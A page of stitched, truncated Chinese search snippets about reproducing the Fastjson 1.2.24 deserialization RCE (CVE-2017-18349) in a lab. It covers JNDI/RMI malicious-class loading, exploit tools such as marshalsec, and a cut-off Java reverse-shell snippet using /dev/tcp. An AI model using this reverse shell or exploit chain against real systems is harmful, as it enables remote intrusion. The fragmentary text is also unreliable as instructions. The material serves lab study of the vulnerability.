fastjson1.2.24-RCE漏洞复现

Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)

1.启动环境并且访问 2.下载marshalsec-0.0.3-SNAPSHOT-all.jar 3.新建Shell.java文件 import java.lang.Runtime; import java.lang.Process; public class shell{ static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {“/bin/bash”,“-c”,“exec 5<>/dev/tcp/192.

具体可以参考这篇文章FastJson的介绍与使用（一）_maven fastjson-CSDN博客fastjson最主要的功能就是可以将Java对象和json之间来回转化，而这个漏洞出现的原因就是在反序列化的过程中。

fastjson 1.2.24漏洞复现

漏洞影响版本【1.2.24之前】

（4）安装完成好后，新建一个java脚本，命名为TouchFile.java，这个文件的作用大致就是使用java创建一个文件，如下为其所有代码，本意为在靶场的tmp目录下创建一个名为。还有一个比较重要的问题就是，攻击思路为：使用Ubuntu的java加载一个调用恶意文件的环境，再使用该环境远程加载一个恶意类，达到借刀进行命令执行的效果。（3）由于我的环境已经安装好恶意调用java的RMI服务，因此这里仅提供以下编译环境的命令，编译成功会出现绿色的"

我们可以看到connect方法中具有JNDI的lookup方法，lookup是JNDI用于查找资源的方法，里面传的参数是dataSourceName，所以我们可以在payload的json字符串中传入这个参数dataSourceName，并且指定他的 值为我们的RMI服务或者其他服务，lookup就会到我们指定的服务中下载恶意代码并执行。fastjson在解析json的过程中，支持使用autoType来实例化某一个具体的类，并调用该类的set/get方法来访问属性。

反序列化Fastjson1.2.24漏洞复现全过程，图文详解，包含复现过程中出现各种问题~

vulhub之fastjson篇-1.2.24-rce

探索Fastjson漏洞利用工具：Fastjson_rec_exploit 去发现同类优质开源项目:https://gitcode.com/ 在软件开发中，安全是至关重要的一环。尤其是当我们处理JSON数据时，一个小小的疏忽可能导致严重的安全问题。项目，这是一个用于检测并演示Fastjson漏洞的工具。 项目简介 Fastjson_rec_exploit是一个轻量级、易于使用的命令行工具，它旨在帮...

有的时候，我们在渗透ceshi 1.下载地址 https://github.com/nex121/FastjsonEXP

探索快速且精准的Fastjson漏洞检测工具：FastjsonScan 在今天这个高度数字化的时代，数据的安全性至关重要。作为Java世界中广泛使用的JSON解析库，Fastjson因其高效性能深受开发者喜爱。然而，随之而来的是频繁出现的安全隐患。为此，我们向您推荐一款强大且持续更新的漏洞探测工具——FastjsonScan，旨在帮助您及时发现并解决Fastjson的反序列化漏洞。 项目介绍 Fa...

安装maven环境后，更新完环境变量，但是每次使用mvn命令必须在source之后才能使用，我用的是kali，网上文章说在~./bash里面更新source /etc/profile 我试过了，没有用，最后是换在ubuntu系统里面安装才成功的，目前还不知道为什么，有大佬知道可以告诉我一下。在fastjson中我们使用构造的json格式字符串进行反序列化的攻击，我们给指定类中的值输入恶意内容（rmi链接），让目标服务在反序列化的时候，请求rmi服务器，执行rmi服务器下发的命令，从而导致远程命令执行漏洞。

Fastjson是一种Java库，用于处理JSON数据。它提供了一种简单高效的方式，用于将Java对象序列化为JSON，以及将JSON反序列化为Java对象。Fastjson以其高速和低内存消耗而闻名，因此在Java应用中广泛应用于JSON的序列化和反序列化。它支持各种功能，如JSON解析、序列化、反序列化以及对JSON数据的操作。Fastjson被广泛应用于Web应用、移动应用和其他基于Java的系统中，用于处理JSON数据。

Fastjson组件反序列化分析，从基础到RCE的过程笔记